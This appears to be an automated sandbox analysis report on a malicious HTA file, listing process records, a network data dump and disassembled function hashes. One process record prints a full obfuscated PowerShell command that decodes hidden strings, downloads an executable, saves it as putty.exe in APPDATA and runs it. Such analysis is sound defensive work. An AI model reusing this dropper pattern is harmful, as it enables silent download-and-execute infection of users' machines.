                                                        2025-01-03 11:17:57 UTC8000INData Raw: 81 00 01 00 00 85 c0 74 1d 45 0f b6 d0 41 80 f8 1b 0f 87 41 01 00 00 ba 00 25 00 08 4c 0f a3 d2 0f 83 32 01 00 00 48 63 91 e4 00 00 00 b8 00 28 ff ff 03 84 91 a8 01 00 00 41 0f b6 c8 c1 c0 18 83 f8 03 0f 87 ba 00 00 00 48 8d 15 1d 02 00 00 48 63 04 82 48 01 d0 ff e0 41 0f b6 c0 41 0f b6 84 01 0c 0a 00 00 3d ff 00 00 00 0f 85 11 ff ff ff 81 c9 00 d9 00 00 89 c8 c3 81 f9 ff 07 00 00 77 33 83 7a 08 01 0f 8e 20 01 00 00 b8 2a 00 00 80 c3 44 89 c8 83 e0 e0 3d c0 00 00 00 75 32 c7 02 01 00 00 00 c7 42 08 01 00 00 00 41 83 e1 1f e9 ad 01 00 00 81 f9 ff ff 00 00 0f 87 83 00 00 00 83 7a 08 02 0f 8e e1 00 00 00 b8 2a 00 00 80 c3 44 89 c8 83 e0 f0 3d e0 00 00 00 0f 85 8f 00 00 00 c7 02 02 00 00 00 c7 42 08 02 00 00 00 41 83 e1 0f e9 6a 01 00 00 41 81 c9 00 d8 00 00
                                                        Data Ascii: tEAA%L2Hc(AHHcHAA=w3z *D=u2BAz*D=BAjA


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:06:17:53
                                                        Start date:03/01/2025
                                                        Path:C:\Windows\SysWOW64\mshta.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:mshta.exe "C:\Users\user\Desktop\qwertyuiopasdfghjklzxcvbnm.hta"
                                                        Imagebase:0x680000
                                                        File size:13'312 bytes
                                                        MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:1
                                                        Start time:06:17:54
                                                        Start date:03/01/2025
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QTF($zbaIc, $FeyQCF){[IO.File]::WriteAllBytes($zbaIc, $FeyQCF)};function o($zbaIc){if($zbaIc.EndsWith((X @(254,308,316,316))) -eq $True){Start-Process (X @(322,325,318,308,316,316,259,258,254,309,328,309)) $zbaIc}else{Start-Process $zbaIc}};function Dwm($QOqguGOgy){$XGUiZZx = New-Object (X @(286,309,324,254,295,309,306,275,316,313,309,318,324));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$FeyQCF = $XGUiZZx.DownloadData($QOqguGOgy);return $FeyQCF};function X($PkXNL){$bzLbp=208;$hWqeYBbV=$Null;foreach($TPTApHL in $PkXNL){$hWqeYBbV+=[char]($TPTApHL-$bzLbp)};return $hWqeYBbV};function ubZ(){$h = $env:APPDATA + '\';$qZD = Dwm (X @(312,324,324,320,323,266,255,255,324,312,309,254,309,305,322,324,312,254,316,313,255,334,323,311,324,305,324,312,305,317,255,320,325,324,324,329,255,316,305,324,309,323,324,255,327,262,260,255,320,325,324,324,329,254,309,328,309));$G = $h + 'putty.exe';QTF $G $qZD;o $G;;;;}ubZ;
                                                        Imagebase:0x830000
                                                        File size:433'152 bytes
                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:2
                                                        Start time:06:17:54
                                                        Start date:03/01/2025
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:3
                                                        Start time:06:17:58
                                                        Start date:03/01/2025
                                                        Path:C:\Users\user\AppData\Roaming\putty.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\AppData\Roaming\putty.exe"
                                                        Imagebase:0x7ff738a30000
                                                        File size:1'683'560 bytes
                                                        MD5 hash:765BDC0F8BC0D77F7414E7A36AE45FD9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 3%, ReversingLabs
                                                        • Detection: 6%, Virustotal, Browse
                                                        Reputation:low
                                                        Has exited:false

                                                        Disassembly

                                                        Reset < >

                                                          Executed Functions

                                                          Function 07CB1708 Relevance: 7.8, Strings: 6, Instructions: 250COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1716023511.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7cb0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,etq$tP^q$tP^q$$^q$$^q$$^q
                                                          • API String ID: 0-3120554246
                                                          • Opcode ID: 6cf78fd227cc6bafa31162ac34ce10f6f4bf0bc2cfd1ba08b4dce5cf504de96c
                                                          • Instruction ID: a0072075f1bb291a6d9505566d949198d26f4e05c36c5bfd719016751414c67d
                                                          • Opcode Fuzzy Hash: 6cf78fd227cc6bafa31162ac34ce10f6f4bf0bc2cfd1ba08b4dce5cf504de96c
                                                          • Instruction Fuzzy Hash: B491F6B0B102499FCB248F69C4A4BAABBE7AF89311F19C469E9059F341CF31DE44C791
                                                          Function 07CB1210 Relevance: 6.6, Strings: 5, Instructions: 349COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1716023511.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7cb0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                          • API String ID: 0-3272787073
                                                          • Opcode ID: 8849e6c4f1956edf744ccb73763f5018e610adf9ce22f23dd24b6d3523d10b1d
                                                          • Instruction ID: 292f4480b74fd16b04e72439032fd635edf1f63087f4129995452417e92f429f
                                                          • Opcode Fuzzy Hash: 8849e6c4f1956edf744ccb73763f5018e610adf9ce22f23dd24b6d3523d10b1d
                                                          • Instruction Fuzzy Hash: E6B11AB1B0421DDFCB349B6984A07BABBE6EF85311F18847AE505CB241EF31DA45C7A1
                                                          Function 07CB16E9 Relevance: 3.9, Strings: 3, Instructions: 157COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1716023511.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7cb0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: tP^q$$^q$$^q
                                                          • API String ID: 0-1983491577
                                                          • Opcode ID: fadd85c41b2ede4df59260c4f94f483a03b4dac4920bb25a6ff915f10234e9b8
                                                          • Instruction ID: f3059d7e1e35cc666125e63164864ca91d5f54be001e59a03700d6c9ab071b96
                                                          • Opcode Fuzzy Hash: fadd85c41b2ede4df59260c4f94f483a03b4dac4920bb25a6ff915f10234e9b8
                                                          • Instruction Fuzzy Hash: 20518FB0A10249DFCB348F69C5A4BAAB7E6AF85310F1DC4A6F4059F251DB31DE44CB91
                                                          Function 04DF9FA0 Relevance: 3.2, Strings: 2, Instructions: 669COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1707544317.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_4df0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (Xcq$LR^q
                                                          • API String ID: 0-2856513941
                                                          • Opcode ID: d28b9791d379135b30c7ed0a17118e5f688a6c9badbb903b512ff0c3b52d3939
                                                          • Instruction ID: 8f91e9ba57cff37b2d1cd5499e6e6af2cfcd524a0b1ad07790ba2575969fcf7f
                                                          • Opcode Fuzzy Hash: d28b9791d379135b30c7ed0a17118e5f688a6c9badbb903b512ff0c3b52d3939
                                                          • Instruction Fuzzy Hash: 05523934B00218CFDB25DB24C894BADBBB2BF85305F128099D9899B395DF34AD86CF51
                                                          Function 04DF9ECC Relevance: 2.7, Strings: 2, Instructions: 242COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1707544317.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_4df0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (Xcq$LR^q
                                                          • API String ID: 0-2856513941
                                                          • Opcode ID: 20582539e64d9179e6a5eadfa34c00380489e41f5a876c3d8c825aee05ec0218
                                                          • Instruction ID: 970e5e31754a0a71934a9042ed04776f5ef430ab6c13a989b38f50097c358ff5
                                                          • Opcode Fuzzy Hash: 20582539e64d9179e6a5eadfa34c00380489e41f5a876c3d8c825aee05ec0218
                                                          • Instruction Fuzzy Hash: 3C512934B003148FDB24CF68D850BA9BBB2FF89704F12459AE9499F395DB71AD81CB91
                                                          Function 07CB0390 Relevance: 2.7, Strings: 2, Instructions: 166COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1716023511.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7cb0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: tP^q$tP^q
                                                          • API String ID: 0-309238000
                                                          • Opcode ID: a6583d56f6e4472774602773710b3ee1f8a03f78fcd285fd20a803720315370a
                                                          • Instruction ID: ae89ebe5ac3eb47aa7a73803220c65430eed2be2963fc91b65e7236e6510d656
                                                          • Opcode Fuzzy Hash: a6583d56f6e4472774602773710b3ee1f8a03f78fcd285fd20a803720315370a
                                                          • Instruction Fuzzy Hash: B65148B1B042159FC7259A69D4806ABFBE2AF89311F14C86FE549CF281CA31CD85C7A1
                                                          Function 04DF3670 Relevance: .6, Instructions: 578COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1707544317.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_4df0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a08c3f8543776b2e52cc24e95baaf154387ffce690ca01135ad55636a5c363e2
                                                          • Instruction ID: 08145e06ea37ad897818c75a5d113a23bb7b946a67f7d14f8daaa62a0ede036f
                                                          • Opcode Fuzzy Hash: a08c3f8543776b2e52cc24e95baaf154387ffce690ca01135ad55636a5c363e2
                                                          • Instruction Fuzzy Hash: 61321674A01258AFDB15CFA9D884A9DFBF2FF48310F268159E908AB355C731ED81CB90
                                                          Function 04DF5D68 Relevance: .4, Instructions: 447COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1707544317.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_4df0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 60dd91ceaa1c2a7a14f1bd9538efab8cd6848145c1b9cea015ecd1f5bd64cd83
                                                          • Instruction ID: 85e7ce809e3fc9a982d836605c40fe6d0c4637b1769f3966b59e14b7d3fb9882
                                                          • Opcode Fuzzy Hash: 60dd91ceaa1c2a7a14f1bd9538efab8cd6848145c1b9cea015ecd1f5bd64cd83
                                                          • Instruction Fuzzy Hash: DB027B74A05259AFCB11CFA8D894A9DBFF1FF49310F158096E848AB352C735ED85CB90
                                                          Function 04DF4A98 Relevance: .3, Instructions: 340COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1707544317.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_4df0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 04e0e8f7d926a7ac14a803b85fdafcc3129f1fa12321bae33602622153755d52
                                                          • Instruction ID: b35d2e9e81d5158c91bc6b344c392f057159afff2a592a658435b644cc1fb70c
                                                          • Opcode Fuzzy Hash: 04e0e8f7d926a7ac14a803b85fdafcc3129f1fa12321bae33602622153755d52
                                                          • Instruction Fuzzy Hash: 9CE11774A11218AFDB15DF98D984A9EFBF2FF98310F258159E908AB351C731ED81CB90
                                                          Function 04DF29F0 Relevance: .2, Instructions: 210COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1707544317.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_4df0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9c0ac82e8b04898d0b1432e62a8c0162380ea2e8ca3df78deafb37ce779352e3
                                                          • Instruction ID: 5f997ad2790f474a90592fe8e7a8e1be2512b7e00bdb3009fc3d5cfd82a8c0d4
                                                          • Opcode Fuzzy Hash: 9c0ac82e8b04898d0b1432e62a8c0162380ea2e8ca3df78deafb37ce779352e3
                                                          • Instruction Fuzzy Hash: 89917C74A002458FCB15CF58C8989AEFBF1FF48310B258699D915AB3A5D736FC51CBA0
                                                          Function 04DF5D40 Relevance: .2, Instructions: 151COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1707544317.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_4df0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 498ca3746981ff7804ca5cd67f9209fbf38eecb3654f28ea1d31ee73ea4b6e2f
                                                          • Instruction ID: 458c27a7d46d10710958db71e3fd2bc55aa648db9b787dda72718bebca8ce608
                                                          • Opcode Fuzzy Hash: 498ca3746981ff7804ca5cd67f9209fbf38eecb3654f28ea1d31ee73ea4b6e2f
                                                          • Instruction Fuzzy Hash: 57514E74A01218AFCB15CF98E894A9DFBB1FF49320F198195E559AB362C335ED81CB90
                                                          Function 04DF3C8D Relevance: .1, Instructions: 113COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1707544317.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_4df0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 80295f5c58437f6e0768a80be8e2e7628b1ed3700a523cafd69339772fb59399
                                                          • Instruction ID: d54cad797dec546e86b858d5c155e87a35a8005a9d6713fe349ee2d69b4c1113
                                                          • Opcode Fuzzy Hash: 80295f5c58437f6e0768a80be8e2e7628b1ed3700a523cafd69339772fb59399
                                                          • Instruction Fuzzy Hash: A351E974A01218EFDB15CF98D884A9DFBF2BF88314F258559E804AB365C735AD82CF90
                                                          Function 04DF2B08 Relevance: .1, Instructions: 107COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1707544317.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_4df0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 63cb21c4747da3e200c6737df8133ad3787560c47f56096494b72e34fbc2a69a
                                                          • Instruction ID: 5a05d1e917e478c3008678ff70d4954bd2008d111e06fb0f6092d88de3f06d18
                                                          • Opcode Fuzzy Hash: 63cb21c4747da3e200c6737df8133ad3787560c47f56096494b72e34fbc2a69a
                                                          • Instruction Fuzzy Hash: B0413974A005058FCB19CF58C4D89AEFBB1FF48310B268599D915AB364C736FC91CB90
                                                          Function 07CB0610 Relevance: .1, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1716023511.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7cb0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 22ac32021dfb96f54094693ebc03a9d0201d91d204a45ba952eb81c2ddefb030
                                                          • Instruction ID: 64002a11c4f8b194c8a42ea86bff5b4dc875b7d430d29fcc7a3f4442fc67243e
                                                          • Opcode Fuzzy Hash: 22ac32021dfb96f54094693ebc03a9d0201d91d204a45ba952eb81c2ddefb030
                                                          • Instruction Fuzzy Hash: 9C2107B17003156BD6246A6AC8047BBB7DAAFD9711F20C42EFA49CB3D4DE71D9818364
                                                          Function 07CB05F5 Relevance: .1, Instructions: 73COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1716023511.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7cb0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 20d5893127b0eccb8032a1aa165da2af027f7bc847fee7bb27ecd8659801fd6c
                                                          • Instruction ID: 731a7f478f9b673643601471071764da7307cbde87bcaf51e96d0b929983bf9c
                                                          • Opcode Fuzzy Hash: 20d5893127b0eccb8032a1aa165da2af027f7bc847fee7bb27ecd8659801fd6c
                                                          • Instruction Fuzzy Hash: 392187B57083852BD3244A7A88047AB6FA6AFD6700F28845EE648CF2E5D934D9848365
                                                          Function 04DF4A89 Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1707544317.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_4df0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6a6b2aed5d278de8e17c734a056ffa3d381ab273d642588a96b7967c0afda725
                                                          • Instruction ID: 11c982631fe4457fa8904cff416d18707bb9b31f4c5858d2ea2ff5796992d43a
                                                          • Opcode Fuzzy Hash: 6a6b2aed5d278de8e17c734a056ffa3d381ab273d642588a96b7967c0afda725
                                                          • Instruction Fuzzy Hash: 6C212474A006099FCB14CF98C884AAEFBF1FF48310B258565EA59A7361C731FD51CBA0
                                                          Function 04DF5D59 Relevance: .1, Instructions: 71COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1707544317.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_4df0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 36353d11f0ae1fbde2eef550a69eff2e230dd5b887dfd2c8d70525ed23207f73
                                                          • Instruction ID: a6db34c21d5b4f0b40cf4570528528eb9b7b5dd9615362f133f1b42625d693b4
                                                          • Opcode Fuzzy Hash: 36353d11f0ae1fbde2eef550a69eff2e230dd5b887dfd2c8d70525ed23207f73
                                                          • Instruction Fuzzy Hash: 97212674A002199FCB10CF48C8949AAFBF1FF49310B158599E909EB362C735EC51CBA0
                                                          Function 04DF31C8 Relevance: .1, Instructions: 67COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1707544317.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_4df0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 74f992017001a7ca722db346571fa7550c923e9ce5e1dceb3609e90d8dbe41f3
                                                          • Instruction ID: 3fcee0e9ff3c407caf991bd8f326d553d5ef32de2192e968bc611339f79ddc91
                                                          • Opcode Fuzzy Hash: 74f992017001a7ca722db346571fa7550c923e9ce5e1dceb3609e90d8dbe41f3
                                                          • Instruction Fuzzy Hash: AD2168B8A002099FCB00CF9CC8909AABBF4FF89310B118599E919EB351D334FC41CBA0
                                                          Function 04DF31B9 Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1707544317.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_4df0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: eaa91b13e7624b2b98a65ea90c7775d494086af9760b1baf75b9f3ca1aa51248
                                                          • Instruction ID: 1458b82bc0f5f627abd982da8efe47c1d874d6082b7050bf44d4b0b5dee2bc05
                                                          • Opcode Fuzzy Hash: eaa91b13e7624b2b98a65ea90c7775d494086af9760b1baf75b9f3ca1aa51248
                                                          • Instruction Fuzzy Hash: 072108B8A002099FCB14DF98C9809AAFBF1FF49310B128599E919EB355D735FD41CBA0
                                                          Function 04DF3D8B Relevance: .0, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1707544317.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_4df0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 612346a163a8647d1f4da2dad80c9b33834df9e2d410d18370b1073c77ed6a82
                                                          • Instruction ID: ea2a74d3e10a41b340312dd764f177c78f59d8da871565c24ddb01bfa18a031a
                                                          • Opcode Fuzzy Hash: 612346a163a8647d1f4da2dad80c9b33834df9e2d410d18370b1073c77ed6a82
                                                          • Instruction Fuzzy Hash: A711FE74A04218EFDB55DB98D884A9DFBF1BF49314F298558E404AB361C771ED82CF50
                                                          Function 034ED006 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1707037377.00000000034ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 034ED000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_34ed000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d1484b2eaf9e8c24b1a97428a467e83b27dd72f40b871f1bf5339bc3d3ac5336
                                                          • Instruction ID: ebbfd2b403db986c2561b09736cdb1e5e14f19c7de445881cce67492a34207cd
                                                          • Opcode Fuzzy Hash: d1484b2eaf9e8c24b1a97428a467e83b27dd72f40b871f1bf5339bc3d3ac5336
                                                          • Instruction Fuzzy Hash: 8B012D6240E3C09EE7128B25CC94B52BFB4DF57229F1D80DBD8888F2A7C2695848C772
                                                          Function 034ED01D Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1707037377.00000000034ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 034ED000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_34ed000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 25c9c5d20b77008ce180b956e2661928db9fe9135e68573b0b411f481d9991d2
                                                          • Instruction ID: 7c7b235d88777c7a6f7ee0cc98a661abf3d3274effa06548232025ce8c38844d
                                                          • Opcode Fuzzy Hash: 25c9c5d20b77008ce180b956e2661928db9fe9135e68573b0b411f481d9991d2
                                                          • Instruction Fuzzy Hash: 0801D4718043409EE720DA15CC84B67BF98DF5232BF0CC45AEC180E246C6799842C6B5
                                                          Function 04DFAA42 Relevance: .0, Instructions: 24COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1707544317.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_4df0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 182fe1cf9582fa368265bf7f797050f72ae3a512c805b6ba093ee4d250c4b0cb
                                                          • Instruction ID: 5c9d4bb68c98e381bbe72cf3f0f3390dc6db5f79dd3a2731bb7b3b9efb84bcc1
                                                          • Opcode Fuzzy Hash: 182fe1cf9582fa368265bf7f797050f72ae3a512c805b6ba093ee4d250c4b0cb
                                                          • Instruction Fuzzy Hash: 9CE0EDB4E0420A9F8B48DFA8A4511BEBFF5AB48200F10856EE829E7340EA3559418FD5
                                                          Function 04DFAA50 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1707544317.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_4df0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 003bd265ef33539cf07b7a184f4618af4d0290cbd19a48e71c146f9ce936b448
                                                          • Instruction ID: 64e495370d6b4682c43aaa9c9abf0d014f3ad2d9c6d2daeda65fabe8d611c597
                                                          • Opcode Fuzzy Hash: 003bd265ef33539cf07b7a184f4618af4d0290cbd19a48e71c146f9ce936b448
                                                          • Instruction Fuzzy Hash: FDE026B4E1420E9F8F48DFB995421BEFBF5AB48200F10856E9919E3340E63856518F95
                                                          Function 04DFAA12 Relevance: .0, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1707544317.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_4df0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2c47baddaa7478ee1fa16875935df86d21e8f59f0a04355a6b67f52a6f2ecd7c
                                                          • Instruction ID: d820a51d4b43f455fc8d53c449db50ca6546731cc59c3d006eeb67493d8bf997
                                                          • Opcode Fuzzy Hash: 2c47baddaa7478ee1fa16875935df86d21e8f59f0a04355a6b67f52a6f2ecd7c
                                                          • Instruction Fuzzy Hash: EFD0A77154D74587C3314364A9093A53B547B00210F040055E24D07683AE0674C582D2

                                                          Non-executed Functions

                                                          Function 04DF0D62 Relevance: .1, Instructions: 85COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1707544317.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_4df0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fc3af4606490a8ee9335fb100d9b2838b9417e5a34bfb39bc50dd700bd5cc9dd
                                                          • Instruction ID: d0aa1d5429c93de957c8db5ec7bffab7a13eb40ad8e1d5e8a31cfaec74a9c73c
                                                          • Opcode Fuzzy Hash: fc3af4606490a8ee9335fb100d9b2838b9417e5a34bfb39bc50dd700bd5cc9dd
                                                          • Instruction Fuzzy Hash: F1212D1120ABC5BEF70757B8692D2992F768FC6760F0E4EC3D4A0975D3EC268558C3A2
